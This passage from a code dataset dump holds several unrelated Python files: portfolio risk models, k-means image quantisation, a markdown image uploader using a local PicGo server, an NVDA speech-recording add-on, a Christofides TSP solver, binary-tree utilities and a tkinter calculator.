ParameterEstimator(standard_deviations)\n \n def pre_evaluation(self, universe, backtest_times):\n super().pre_evaluation(universe, backtest_times)\n self.sigmas_parameter = cp.Parameter(len(universe)-1) #+self.kelly))\n\n def values_in_time(self, t, past_returns, **kwargs):\n \"\"\"Update forecast error risk here, and take square root of Sigma.\"\"\"\n #super().values_in_time(t, current_weights, current_portfolio_value, past_returns, past_volumes, **kwargs)\n super().values_in_time(t=t, past_returns=past_returns, **kwargs)\n \n # if self.sigma_squares is None:\n # sigma_squares = past_returns.var(ddof=0)\n # if self.kelly:\n # mean = past_returns.mean()\n # sigma_squares += mean**2\n # if self.zeroforcash:\n # sigma_squares[-1] = 0.\n # sigma_squares = sigma_squares.values\n # else:\n # sigma_squares = self.sigma_squares.current_value\n \n sigma_squares = self.sigma_squares.current_value\n\n self.sigmas_parameter.value = np.sqrt(sigma_squares)\n\n def compile_to_cvxpy(self, w_plus, z, w_plus_minus_w_bm):\n\n return cp.sum_squares(cp.multiply(w_plus_minus_w_bm[:-1], self.sigmas_parameter))\n\n\nclass FactorModelCovariance(BaseRiskModel):\n \"\"\"Factor model covariance, either user-provided or fitted from the data.\n \n It has the structure\n \n :math:`F F^T + \\mathbf{diag}(d)`\n \n where :math:`F` is a *tall* matrix (many more rows than columns) and the vector\n :math:`d` is all non-negative. \n \n :param F: exposure matrices either constant or varying in time; if so, use a pandas multiindexed\n dataframe. If None it will be fitted.\n :type F: pd.DataFrame or None\n :param d: idyosyncratic variances either constant or varying in time; If None it will be fitted.\n :type d: pd.Series or pd.DataFrame or None\n :param num_factors: number of factors (columns of F), used if fitting the model\n :type num_factors: int \n \"\"\"\n\n # Args:\n # exposures (pd.DataFrame): constant factor exposure matrix or a dataframe\n # where the first index is time.\n # idyosync (pd.DataFrame or pd.Series): idyosyncratic variances for the symbol,\n # either fixed (pd.Series) or through time (pd.DataFrame).\n # factor_Sigma (pd.DataFrame or None): a constant factor covariance matrix\n # or a DataFrame with multiindex where the first index is time. If None,\n # the default, it is understood that the factor covariance is the identity.\n # (Otherwise we compute its matrix square root at each step internally and\n # apply it to the exposures).\n # forecast_error_kappa (float or pd.Series): uncertainty on the\n # assets' correlations. 
See the paper, pages 32-33.\n\n # \"\"\"\n\n factor_Sigma = None\n\n def __init__(self, F=None, d=None, num_factors=1, kelly=True):#, normalize=False):\n self.F = F if F is None else DataEstimator(F, compile_parameter=True) \n self.d = d if d is None else DataEstimator(d) \n if (self.F is None) or (self.d is None):\n self.fit = True\n self.Sigma = HistoricalFactorizedCovariance(kelly=kelly) #Sigma\n else:\n self.fit = False\n self.num_factors = num_factors\n # self.kelly = True\n # self.zeroforcash = True\n # self.normalize = normalize\n\n # @staticmethod\n # def build_low_rank_model(rets, num_factors=10, iters=10, normalize=True, shrink=True):\n # r\"\"\"Build a low rank risk model from past returns that include NaNs.\n #\n # This is an experimental procedure that may work well on past returns\n # matrices with few NaN values (say, below 20% of the total entries).\n # If there are (many) NaNs, one should probably also use a rather\n # large risk forecast error.\n # \"\"\"\n # # rets = past_returns.iloc[:,:-1] # drop cash\n # nan_fraction = rets.isnull().sum().sum() / np.prod(rets.shape)\n # normalizer = np.sqrt((rets**2).mean())\n # if normalize:\n # normalized = rets/(normalizer + 1E-8)\n # else:\n # normalized = rets\n # if nan_fraction:\n # if nan_fraction > 0.1 and not shrink:\n # warnings.warn(\"Low rank model estimation on past returns with many NaNs should use the `shrink` option\")\n # nan_implicit_imputation = pd.DataFrame(0., columns=normalized.columns, index = normalized.index)\n # for i in range(iters):\n # u, s, v = np.linalg.svd(normalized.fillna(nan_implicit_imputation), full_matrices=False)\n # nan_implicit_imputation = pd.DataFrame(\n # (u[:, :num_factors] * (s[:num_factors] - s[num_factors] * shrink)) @ v[:num_factors],\n # columns = normalized.columns, index = normalized.index)\n # else:\n # u, s, v = np.linalg.svd(normalized, full_matrices=False)\n # F = v[:num_factors].T * s[:num_factors] / np.sqrt(len(rets))\n # if normalize:\n # F = pd.DataFrame(F.T * (normalizer.values + 1E-8), columns=normalizer.index)\n # else:\n # F = pd.DataFrame(F.T, columns=normalizer.index)\n # idyosyncratic = normalizer**2 - (F**2).sum(0)\n # if not np.all(idyosyncratic >= 0.):\n # raise ForeCastError(\"Low rank risk estimation with iterative SVD did not work.\")\n # return F, idyosyncratic\n\n def pre_evaluation(self, universe, backtest_times):\n super().pre_evaluation(universe, backtest_times)\n # super().pre_evaluation(returns, volumes, start_time, end_time, **kwargs)\n self.idyosync_sqrt_parameter = cp.Parameter(len(universe)-1)\n self.F_parameter = cp.Parameter((self.num_factors, len(universe)-1)) if self.F is None else self.F.parameter\n # if not (self.factor_Sigma is None):\n # self.factor_Sigma_sqrt = cp.Parameter(self.factor_Sigma.shape, PSD=True)\n # self.forecast_error_penalizer = cp.Parameter(returns.shape[1], nonneg=True)\n\n def values_in_time(self, t, past_returns, **kwargs):\n super().values_in_time(t=t, past_returns=past_returns, **kwargs)\n \n # if self.F is None:\n # if not self.kelly:\n # past_returns = past_returns - past_returns.mean()\n # if self.zeroforcash:\n # past_returns = pd.DataFrame(past_returns, copy=True)\n # past_returns.iloc[:, -1] = 0.\n # F, d = self.build_low_rank_model(past_returns, num_factors=self.num_factors, normalize=self.normalize)\n # self.F_parameter.value = F.values\n # d = d.values\n # else:\n # d = self.d.current_value\n if self.fit:\n Sigmasqrt = self.Sigma.current_value\n # numpy eigendecomposition has largest eigenvalues last\n 
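# (editor's note) Sigmasqrt is assumed to be the factorization returned by\n            # HistoricalFactorizedCovariance, i.e. Sigma = Sigmasqrt @ Sigmasqrt.T with columns ordered\n            # by increasing eigenvalue, so keeping the last num_factors columns as the exposures and\n            # collapsing the squared row-norms of the dropped columns into d reproduces the\n            # F F^T + diag(d) structure from the class docstring (only the off-diagonal part of the\n            # dropped factors is lost). For example, with 10 non-cash assets and num_factors=2 the\n            # shapes would be Sigmasqrt (10, 10), F_parameter.value (2, 10) and d (10,).\n            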
self.F_parameter.value = Sigmasqrt[:, -self.num_factors:].T\n d = (Sigmasqrt[:, :-self.num_factors]**2).sum(1)\n else:\n d = self.d.current_value\n self.idyosync_sqrt_parameter.value = np.sqrt(d)\n\n\n def compile_to_cvxpy(self, w_plus, z, w_plus_minus_w_bm):\n self.expression = cp.sum_squares(cp.multiply(self.idyosync_sqrt_parameter, w_plus_minus_w_bm[:-1]))\n assert self.expression.is_dcp(dpp=True)\n\n self.expression += cp.sum_squares(self.F_parameter @ w_plus_minus_w_bm[:-1])\n assert self.expression.is_dcp(dpp=True)\n\n return self.expression\n \n\nclass WorstCaseRisk(BaseRiskModel):\n \"\"\"Select the most restrictive risk model for each value of the allocation vector.\n\n Given a list of risk models, penalize the portfolio allocation by the\n one with highest risk value at the solution point. If uncertain about\n which risk model to use this procedure can be an easy solution.\n\n :param riskmodels: risk model instances on which to compute the worst-case\n risk.\n :type riskmodels: list \n \"\"\"\n\n def __init__(self, riskmodels):\n self.riskmodels = riskmodels\n\n def pre_evaluation(self, universe, backtest_times):\n \"\"\"Initialize objects.\"\"\"\n for risk in self.riskmodels:\n risk.pre_evaluation(universe, backtest_times)\n\n def values_in_time(self, **kwargs):\n \"\"\"Update parameters.\"\"\"\n for risk in self.riskmodels:\n risk.values_in_time(**kwargs)\n\n def compile_to_cvxpy(self, w_plus, z, w_plus_minus_w_bm):\n risks = [risk.compile_to_cvxpy(w_plus, z, w_plus_minus_w_bm)\n for risk in self.riskmodels]\n return cp.max(cp.hstack(risks))\n","repo_name":"danishdalim/cvxportfolio","sub_path":"cvxportfolio/risks.py","file_name":"risks.py","file_ext":"py","file_size_in_byte":17201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"16"} +{"seq_id":"15400293143","text":"from sklearn.cluster import KMeans\n\nimport matplotlib as mpl\nmpl.use('TkAgg')\n\nimport cv2\n\ndef kmeansclustering(image, k):\n # Convert from BGR to LAB\n image = cv2.cvtColor(image, cv2.COLOR_BGR2Lab)\n\n # Convert to list of pixels for clustering\n pixellist = image.reshape((image.shape[0] * image.shape[1], 3))\n\n # Perform kmeans clustering\n cluster = KMeans(n_clusters=k)\n labels = cluster.fit_predict(pixellist)\n quant = cluster.cluster_centers_.astype(\"uint8\")[labels]\n\n # Reshape feature vectors back to form the image\n quant = quant.reshape((image.shape[0], image.shape[1], 3))\n\n # Convert from LAB to RGB\n quant = cv2.cvtColor(quant, cv2.COLOR_LAB2RGB)\n\n return quant","repo_name":"margaretpearce/cs766-project","sub_path":"app/kmeans.py","file_name":"kmeans.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"20527898505","text":"# -*- coding: UTF-8 -*-\n\nimport os\nimport requests\nimport json\n\nDIR_PATH = \"C:\\\\WebSecurity\\\\hvv\\\\笔记\\\\hvv\"# os.path.abspath(os.path.dirname(__file__)) \nL_cur = 2 \nR_cur = 1 \nimage_local_add = 'C:'\nimage_remote_add = 'https://'\nfile_data_cache = \"\"\nlog_data_cache = \"\" #日志缓存\n\ndef file_update(file):\n os.chdir(DIR_PATH)\n with open(file, 'w', encoding='utf-8') as fw:\n fw.write(file_data_cache)\n fw.close\n\ndef image_upload():\n data = json.dumps({'list': [image_local_add]})\n response = requests.post(url='http://127.0.0.1:36677/upload', data = data)\n return response\n\nif __name__ == '__main__':\n log_file = open(\"log.txt\", \"r+\",encoding=\"utf-8\")\n log_data_cache += log_file.read()\n files = 
os.listdir(DIR_PATH)\n os.chdir(DIR_PATH)\n file_num = 0\n for file in files: #处理目录下每个文件\n\n if (not os.path.isdir(file) and file[-3:] == '.md'): \n file_num += 1\n file_data_cache = \"\"\n with open(file,'r',encoding = 'utf-8') as f:\n line_num = 0\n for line in f: \n if (line.find('![image') != -1 and line.find(\"http\") == -1):\n L_cur = line.find('(') + 1\n R_cur = line.find(')')\n image_local_add = line[L_cur:R_cur]\n # print(image_local_add)\n line_num += 1\n log_data_cache += \"uploading:正在上传第\" + str(file_num) + \"个文件\\'\" + file + \"\\'的第\" + str(line_num) + \"张图片......\"\n print(\"uploading:正在上传第\" + str(file_num) + \"个文件\\'\" + file + \"\\'的第\" + str(line_num) + \"张图片......\")\n response = image_upload() # 上传\n # print(type(response.text))\n # print(response.text)\n if(response.text.find('false') != -1): # 报错\n log_data += \"Upload fail! PicGo upload error!\\nPlease check your PicGo setting and web connection!\\n\"\n print(\"Upload fail! PicGo upload error!\\nPlease check your PicGo setting and web connection!\\n\")\n print(image_local_add)\n else:\n log_data += \"Upload Success!\"\n print(\"Upload Success!\")\n image_remote_add = response.text[response.text.find('https://'):response.text.find(\"\\\"]}\")]\n # print(image_remote_add)\n line = line.replace(image_local_add,image_remote_add)\n file_data_cache += line\n f.close()\n file_update(file) \n log_file.write(log_data_cache)\n log_file.close()","repo_name":"Lq0ne/md_pic_online","sub_path":"md_pic_online.py","file_name":"md_pic_online.py","file_ext":"py","file_size_in_byte":2825,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"12101551613","text":"import globalPluginHandler\ntry:\n\timport speech.speech as speech\nexcept ModuleNotFoundError:\n\timport speech\nimport speechViewer\nimport gui\nimport core\nimport ui\nimport api\nimport os\nimport wx\nimport globalVars\nimport time\nfrom scriptHandler import script\nimport addonHandler\n# Start the translation process\naddonHandler.initTranslation()\n\nstart = False\noldSpeak = speech.speak\ncontents = \"\"\n\n# In the original work the file was stored in a path not easily accessed by the normal user, due to translation of the folder name in, at least, Windows 10 in portuguese...\n_NRIniFile = os.path.join(globalVars.appArgs.configPath,\"NVDARecord.txt\")\n\ndef getSequenceText(sequence):\n\treturn speechViewer.SPEECH_ITEM_SEPARATOR.join([x for x in sequence if isinstance(x, str)])\n\ndef mySpeak(sequence, *args, **kwargs):\n\tglobal contents\n\toldSpeak(sequence, *args, **kwargs)\n\ttext = getSequenceText(sequence)\n\tif text:\n\t\tif \"\\n\" not in text:\n\t\t\ttext += \"\\n\"\n\t\tcontents += text\n\n\nclass GlobalPlugin(globalPluginHandler.GlobalPlugin):\n\t# Creating the constructor of the newly created GlobalPlugin class.\n\tdef __init__(self):\n\t\t# Call of the constructor of the parent class.\n\t\tsuper(GlobalPlugin, self).__init__()\n\t\t# Avoid use in secure screens\n\t\tif globalVars.appArgs.secure:\n\t\t\treturn\n\n\t@script(\n\t# Translators: Message to be announced during Keyboard Help\n\tdescription=_(\"Activate/deactivate recording on NVDARecorder\"),\n\tgesture=\"kb:alt+numpadplus\")\n\tdef script_record(self, gesture):\n\t\tglobal start\n\t\tstart = not start\n\t\tif not start:\n\t\t\tspeech.speak = oldSpeak\n\t\t\tglobal contents\n\t\t\twith open(_NRIniFile, \"w\", encoding = \"utf-8\") as file:\n\t\t\t\tfile.write(contents)\n\t\t\t\tfile.close()\n\t\t\t\tglobal recorded\n\t\t\t\trecorded = 
contents\n\t\t\t\tgui.mainFrame._popupSettingsDialog(ShowResults)\n\t\t\tui.message(_(\"Recording stopped\"))\n\t\t\tcontents = \"\"\n\t\telse:\n\t\t\tui.message(_(\"Start recording\"))\n\t\t\tspeech.speak = mySpeak\n\n\nclass ShowResults(wx.Dialog):\n\tdef __init__(self, *args, **kwds):\n\t\tkwds[\"style\"] = kwds.get(\"style\", 0) | wx.DEFAULT_DIALOG_STYLE\n\t\twx.Dialog.__init__(self, *args, **kwds)\n\t\tself.SetTitle(_(\"NVDA recorder\"))\n\n\t\tsizer_1 = wx.BoxSizer(wx.VERTICAL)\n\n\t\t# Translators: Static text announcing the results\n\t\tlabel_1 = wx.StaticText(self, wx.ID_ANY, _(\"Here is the recorded text:\"))\n\t\tsizer_1.Add(label_1, 0, 0, 0)\n\n\t\tglobal contents\n\t\tself.text_ctrl_1 = wx.TextCtrl(self, wx.ID_ANY, recorded, size = (550, 350), style=wx.TE_MULTILINE | wx.TE_READONLY)\n\t\tsizer_1.Add(self.text_ctrl_1, 0, 0, 0)\n\n\t\tsizer_2 = wx.StdDialogButtonSizer()\n\t\tsizer_1.Add(sizer_2, 0, wx.ALIGN_RIGHT | wx.ALL, 4)\n\n\t\t# Translators: Name of button to open the TXT file folder\n\t\tself.button_1 = wx.Button(self, wx.ID_ANY, _(\"Open NVDARecord.txt's folder\"))\n\t\tself.button_1.SetDefault()\n\t\tsizer_2.Add(self.button_1, 0, 0, 0)\n\n\t\t# Translators: Name of button that allows to copy results to clipboard\n\t\tself.button_SAVE = wx.Button(self, wx.ID_ANY, _(\"Copy to clipboard\"))\n\t\tsizer_2.Add(self.button_SAVE, 0, 0, 0)\n\n\t\tself.button_CLOSE = wx.Button(self, wx.ID_CLOSE, \"\")\n\t\tsizer_2.AddButton(self.button_CLOSE)\n\n\t\tsizer_2.Realize()\n\n\t\tself.SetSizer(sizer_1)\n\t\tsizer_1.Fit(self)\n\n\t\tself.SetEscapeId(self.button_CLOSE.GetId())\n\t\tself.Bind(wx.EVT_BUTTON, self.openFolder, self.button_1)\n\t\tself.Bind(wx.EVT_BUTTON, self.copyToClip, self.button_SAVE)\n\t\tself.Bind(wx.EVT_BUTTON, self.quit, self.button_CLOSE)\n\n\t\tself.Layout()\n\t\tself.CentreOnScreen()\n\n\tdef openFolder(self, event):\n\t\tself.Destroy()\n\t\tevent.Skip()\n\t\tos.startfile(os.path.join(globalVars.appArgs.configPath))\n\n\tdef copyToClip(self, event):\n\t\tevent.Skip()\n\t\t# Copy result to clipboard\n\t\tapi.copyToClip(recorded)\n\n\tdef quit(self, event):\n\t\tself.Destroy()\n\t\tevent.Skip()\n\n","repo_name":"ruifontes/NVDARecorder","sub_path":"addon/globalPlugins/NVDARecorder/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3677,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"43955105821","text":"# See README.md for description\nimport os\nimport numpy as np\nimport pandas as pd\nimport networkx as nx\nimport matplotlib.pyplot as plt\n\n# Import data\nROOT_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\ndata_file = os.path.join(ROOT_DIR, \"Algo\", \"data\", \"test1.csv\")\nadj = pd.read_csv(data_file, header=None)\nadj = adj.to_numpy()\n\n\ndef cost(adj, cycle):\n cost = 0\n for i, node in enumerate(cycle[:-1]):\n next_node = cycle[i + 1]\n cost += adj[node][next_node]\n return cost\n\ndef shortcutting(circuit):\n nodes = []\n for u, v in circuit:\n if not nodes:\n nodes.append(u)\n if v not in nodes:\n nodes.append(v)\n nodes.append(nodes[0])\n return nodes\n\ndef christofides_impl(G, weight=\"weight\"):\n loop_nodes = (n for n, neighbors in G.adj.items() if n in neighbors)\n try:\n node = next(loop_nodes)\n except StopIteration:\n pass\n else:\n G = G.copy()\n G.remove_edge(node, node)\n G.remove_edges_from((n, n) for n in loop_nodes)\n check = False\n for n,ndict in G.adj.items():\n if len(ndict)!=len(G)-1:\n check=True\n break\n if check:\n raise 
nx.NetworkXError(\"G must be a complete graph.\")\n tree = nx.minimum_spanning_tree(G)\n L = G.copy()\n nodes = []\n for v,degree in (tree.degree):\n if degree%2==0: \n nodes.append(v)\n L.remove_nodes_from(nodes)\n MG = nx.MultiGraph()\n MG.add_edges_from(tree.edges)\n edges = nx.min_weight_matching(L)\n MG.add_edges_from(edges)\n return shortcutting(nx.eulerian_circuit(MG))\n\ndef christofides(adj=adj):\n\n G = nx.from_numpy_array(adj)\n pos = nx.spring_layout(G, scale=2)\n\n pos[0] = (0.5, 0.5)\n\n cycle = christofides_impl(G)\n edge_list = list(nx.utils.pairwise(cycle))\n\n nx.draw_networkx(\n G,\n pos,\n with_labels=True,\n edgelist=edge_list,\n edge_color=\"red\",\n node_size=200,\n width=1,\n )\n print(f\"The order of traversal is: {cycle}\")\n print(f\"The cost of the traversal is: {cost(adj, cycle)}\")\n return cycle, cost(adj, cycle)\n # plt.show()\n\n\ndef main():\n christofides(adj)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"YBenPan/TSP_NYC","sub_path":"Algo/christofides.py","file_name":"christofides.py","file_ext":"py","file_size_in_byte":2234,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"26665978264","text":"# Tree traversal\r\n# Build tree from inorder,preorder\r\n\r\nclass Node:\r\n def __init__(self,key):\r\n self.value=key\r\n self.left=None\r\n self.right=None\r\n \r\n \r\n#Find max and min elem in BT\r\ndef find_max_min(root):\r\n minimum =65635 \r\n \r\n if(root is not None):\r\n root_val=root.value\r\n left=find_max_min(root.left)\r\n right=find_max_min(root.right)\r\n if(left > right):\r\n minimum=right\r\n \r\n else:\r\n minimum=left\r\n \r\n if(root_val < minimum):\r\n minimum=root_val\r\n \r\n \r\n return minimum\r\n \r\n#HEight of a tree or max dept og a tree\r\ndef height_of_a_tree(root):\r\n if(root is None):\r\n return 0\r\n else:\r\n left=height_of_a_tree(root.left)\r\n right=height_of_a_tree(root.right)\r\n \r\n height=max(left,right)\r\n return height + 1\r\n \r\n#Find minimum depth of a binary tree\r\ndef minDepth(root):\r\n if root == None:\r\n return 0\r\n if root.left==None or root.right==None:\r\n return minDepth(root.left)+minDepth(root.right)+1\r\n return min(minDepth(root.right),minDepth(root.left))+1\r\n \r\ndef find_deepest_node_in_a_tree(root,height):\r\n if(root is None):\r\n return None\r\n else:\r\n if(height==1):\r\n x=root.value\r\n return x\r\n else:\r\n find_deepest_node_in_a_tree(root.left,height - 1)\r\n find_deepest_node_in_a_tree(root.right,height - 1)\r\n \r\n \r\n#Find leaves in a binary tree:\r\ndef find_leaves_BT(root):\r\n if root is None:\r\n return 0\r\n \r\n res=0\r\n if root.left is None and root.right is None:\r\n print(root.value)\r\n res+=1\r\n \r\n \r\n res+= find_leaves_BT(root.left) + find_leaves_BT(root.right)\r\n return res\r\n \r\n \r\n#Find full nodes in a binary tree:\r\ndef find_full_nodes_BT(root):\r\n if root is None:\r\n return 0\r\n \r\n res=0\r\n if root.left and root.right:\r\n print(root.value)\r\n res+=1\r\n \r\n \r\n res+=find_full_nodes_BT(root.left) + find_full_nodes_BT(root.right)\r\n \r\n return res\r\n \r\n 
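\r\n# (editor's note) With the sample tree built below (nodes 1..7 in a complete binary tree) the\r\n# helpers above give: find_max_min -> 1 (despite its name it only tracks the minimum value),\r\n# height_of_a_tree -> 3, minDepth -> 3, find_leaves_BT -> 4 (printing 4, 5, 6, 7) and\r\n# find_full_nodes_BT -> 3 (printing 1, 2, 3); find_deepest_node_in_a_tree discards the results\r\n# of its recursive calls, so it only returns a value when called with height == 1.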
\r\ncount=0\r\nroot=Node(1)\r\nroot.left=Node(2)\r\nroot.right=Node(3)\r\nroot.left.left=Node(4)\r\nroot.left.right=Node(5)\r\nroot.right.left=Node(6)\r\nroot.right.right=Node(7)\r\n#root.right.right.right=Node(8)\r\nmaximum=find_max_min(root)\r\n#print(maximum)\r\nheight=height_of_a_tree(root)\r\nprint(\"Height\"+str(height))\r\nminDepth=minDepth(root)\r\n#print(minDepth)\r\nnode_in_deepest_level=find_deepest_node_in_a_tree(root,height)\r\nprint(node_in_deepest_level)\r\nprint(\"Leaves\")\r\ncount=find_leaves_BT(root)\r\nprint(\"COunt\"+str(count))\r\nfullnodes=find_full_nodes_BT(root)\r\nprint(\"Full Nodes\"+str(fullnodes))\r\n","repo_name":"spurthirao999/DataStructures","sub_path":"MIn_MAX_TREE.py","file_name":"MIn_MAX_TREE.py","file_ext":"py","file_size_in_byte":2862,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"3879727920","text":"#Rakesh kumar khetwal\n#On button not in use sorry\nimport tkinter as tk #creating alias of tkinter\nfrom tkinter import font\nx=[]\nclass MyUI(tk.Frame): #tk.frame is predefined class and acting as a base class\n def __init__(self,master=None): # here master and self are not the the argumentt taken from the base class tk.Frame \n super().__init__(master) # here the __init__() is a function inside the tk.Frame base class\n self.pack() # render or create the frame , where pack is in-built function\n self.create_widgets()\n \n def nik(self,tex,tv,his):\n \n return lambda : self.calc(tex,tv,his)\n\n def calc(self,tex,tv,his):\n tex.insert(tk.END, tv)\n if tv.find('DEL')!=-1:\n his.insert(tk.END,'\\n')\n elif tv.find('AC')!=-1:\n his.insert(tk.END,'\\n')\n else:\n his.insert(tk.END,tv)\n \n \n x.append(tv) \n y=''.join(x) # for concatenating the list into single string\n try: \n if y.find('=')!=-1:\n tex.delete('1.0', tk.END)\n y=y.replace('=','')\n y=y.replace('Ans','')\n if y.find(\"/\")!=-1: \n s=y.split('/')\n z=len(s)\n print(z)\n if float(s[1])!=0.0:\n suma=float(s[0])/float(s[1])\n tex.insert(tk.END, suma)\n suma=float(suma)\n his.insert(tk.END,suma)\n his.insert(tk.END,'\\n')\n suma=str(suma)\n print(\"Division of nos\",suma)\n x[:]=[]\n x.append(suma)\n else:\n his.insert(tk.END,'Math error')\n tex.insert(tk.END,'Math error')\n \n elif y.find(\"X\")!=-1: # for multiplication\n suma=1\n \n s=y.split('X')\n \n z=len(s)\n print(z)\n for i in range(0,z):\n suma=suma*float(s[i])\n tex.insert(tk.END, suma)\n print(\"multiplication of nos\",suma)\n suma=float(suma)\n his.insert(tk.END,suma)\n his.insert(tk.END,'\\n')\n suma=str(suma)\n x[:]=[]\n x.append(suma)\n\n elif y.find(\"+\")!=-1: # for addition\n suma=0\n \n s=y.split('+')\n \n z=len(s)\n print(z)\n for i in range(0,z):\n suma=suma+float(s[i])\n tex.insert(tk.END, suma)\n print(\"sum of nos\",suma)\n suma=float(suma)\n his.insert(tk.END,suma)\n his.insert(tk.END,'\\n')\n suma=str(suma)\n x[:]=[]\n x.append(suma)\n\n elif y.find(\"-\")!=-1:\n s=y.split('-')\n z=len(s)\n print(z)\n suma=float(s[0])-float(s[1])\n tex.insert(tk.END, suma)\n print(\"subtraction of nos\",suma)\n suma=float(suma)\n his.insert(tk.END,suma)\n his.insert(tk.END,'\\n')\n suma=str(suma)\n x[:]=[]\n x.append(suma)\n \n elif y.find(\"DEL\")!=-1: # for deletion\n x[:]=[]\n tex.delete('1.0', tk.END)\n return\n \n elif y.find(\"AC\")!=-1: # for deletion\n x[:]=[]\n tex.delete('1.0', tk.END)\n return\n \n except:\n None\n \n def create_widgets(self): # for creating wizards\n # can't use grid and pack in same function\n h =font.Font(family='Helvetica', size=36, 
weight=font.BOLD)# here Font is a function inbuilt inside the from tkinter import font and font is a function inside tinkter\n #making of text box\n cc=font.Font(family='Helvetica', size=20, weight=font.BOLD)\n xx=font.Font(family='Helvetica', size=25, weight=font.BOLD)\n self.shows=tk.Text(self,width=21,font=xx,height=1,fg='black',bg='light blue')\n self.shows.insert(tk.END,'Rakesh Kumar Khetwal')\n self.shows.grid(row=0,column=5)\n #Output Box\n self.show = tk.Text(self,width=25,height=1.5,bg='brown',fg='white',font=cc) \n self.show.grid(row=3, column=5,rowspan=5,columnspan=5)\n # Histroy box\n self.his=tk.Text(self,width=15,height=7,bg='brown',fg='white',font=cc)\n self.his.grid(row=0,column=5,rowspan=5,columnspan=7)\n self.his.insert(tk.END,\"-------Histroy-------\")\n \n #For creating the buttons\n self.a = tk.Button(self,text=\"7\",fg=\"white\",bg=\"black\",font=h,height=0,width=0)\n tv=self.a[\"text\"]\n self.a[\"command\"] = self.nik(self.show,tv,self.his)\n self.a.grid(column=0, row=0,padx=(2,2),pady=(2,2))\n\n #Unsuccessful attempts for inputing the value inside the text inside gui frame\n #self.a[\"command\"]=self.extract(tv)\n # xx=self.show.insert(tk.END,self.a['text'])\n # self.a[\"command\"] = print(self.a['text'])\n #self.a.bind('<Button-1>', y.insert(tk.END,gg))\n #self.show['text']=\"7\";\n #self.show.insert('1.0','vv')\n \n self.b = tk.Button(self,text=\"8\",fg=\"white\",bg=\"black\",font=h)\n tv=self.b[\"text\"]\n self.b[\"command\"] = self.nik(self.show,tv,self.his)\n self.b.grid(column=1, row=0,padx=(2,2),pady=(2,2))\n \n self.c = tk.Button(self,text=\"9\",fg=\"white\",bg=\"black\",font=h)\n tv=self.c[\"text\"]\n self.c[\"command\"] = self.nik(self.show,tv,self.his)\n self.c.grid(column=2, row=0,padx=(2,2),pady=(2,2))\n\n self.k = tk.Button(self,text=\"DEL\",fg=\"white\",bg=\"red\",font=h,width=4)\n tv=self.k[\"text\"]\n self.k[\"command\"] = self.nik(self.show,tv,self.his)\n self.k.grid(column=3, row=0,padx=(2,2),pady=(2,2))\n\n self.l = tk.Button(self,text=\"AC\",fg=\"white\",bg=\"red\",font=h,width=4) \n tv=self.l[\"text\"]\n self.l[\"command\"] = self.nik(self.show,tv,self.his)\n self.l.grid(column=4, row=0,padx=(2,2),pady=(2,2))\n\n self.d = tk.Button(self,text=\"4\",fg=\"white\",bg=\"black\",font=h)\n tv=self.d[\"text\"]\n self.d[\"command\"] = self.nik(self.show,tv,self.his)\n self.d.grid(column=0, row=1,padx=(2,2),pady=(2,2))\n \n self.e = tk.Button(self,text=\"5\",fg=\"white\",bg=\"black\",font=h)\n tv=self.e[\"text\"]\n self.e[\"command\"] = self.nik(self.show,tv,self.his)\n self.e.grid(column=1, row=1,padx=(2,2),pady=(2,2)) \n\n self.f = tk.Button(self,text=\"6\",fg=\"white\",bg=\"black\",font=h)\n tv=self.f[\"text\"]\n self.f[\"command\"] = self.nik(self.show,tv,self.his)\n self.f.grid(column=2, row=1,padx=(2,2),pady=(2,2))\n\n self.m = tk.Button(self,text=\"X\",fg=\"white\",bg=\"light green\",font=h,width=4) \n tv=self.m[\"text\"]\n self.m[\"command\"] = self.nik(self.show,tv,self.his)\n self.m.grid(column=3, row=1,padx=(2,2),pady=(2,2))\n\n self.n = tk.Button(self,text=\"/\",fg=\"white\",bg=\"light green\",font=h,width=4) \n tv=self.n[\"text\"]\n self.n[\"command\"] = self.nik(self.show,tv,self.his)\n self.n.grid(column=4, row=1,padx=(2,2),pady=(2,2))\n\n self.g = tk.Button(self,text=\"1\",fg=\"white\",bg=\"black\",font=h) \n tv=self.g[\"text\"]\n self.g[\"command\"] = self.nik(self.show,tv,self.his)\n self.g.grid(column=0, row=2,padx=(2,2),pady=(2,2))\n \n self.h = tk.Button(self,text=\"2\",fg=\"white\",bg=\"black\",font=h)\n tv=self.h[\"text\"]\n 
self.h[\"command\"] = self.nik(self.show,tv,self.his)\n self.h.grid(column=1, row=2,padx=(2,2),pady=(2,2))\n\n self.i = tk.Button(self,text=\"3\",fg=\"white\",bg=\"black\",font=h) \n tv=self.i[\"text\"]\n self.i[\"command\"] = self.nik(self.show,tv,self.his)\n self.i.grid(column=2, row=2,padx=(2,2),pady=(2,2))\n\n self.o = tk.Button(self,text=\"+\",fg=\"white\",bg=\"light green\",font=h,width=4) \n tv=self.o[\"text\"]\n self.o[\"command\"] = self.nik(self.show,tv,self.his)\n self.o.grid(column=3, row=2,padx=(2,2),pady=(2,2))\n\n self.p = tk.Button(self,text=\"-\",fg=\"white\",bg=\"light green\",font=h,width=4) \n tv=self.p[\"text\"]\n self.p[\"command\"] = self.nik(self.show,tv,self.his)\n self.p.grid(column=4, row=2,padx=(2,2),pady=(2,2))\n\n self.q = tk.Button(self,text=\"0\",fg=\"white\",bg=\"black\",font=h) \n tv=self.q[\"text\"]\n self.q[\"command\"] = self.nik(self.show,tv,self.his)\n self.q.grid(column=0, row=3,padx=(2,2),pady=(2,2))\n\n z =font.Font(family='Helvetica', size=36, weight=font.BOLD)\n self.r = tk.Button(self,text=\".\",fg=\"white\",bg=\"black\",font=z,width=2)\n tv=self.r[\"text\"]\n self.r[\"command\"] = self.nik(self.show,tv,self.his)\n self.r.grid(column=1, row=3,padx=(2,2),pady=(2,2)) \n\n self.t = 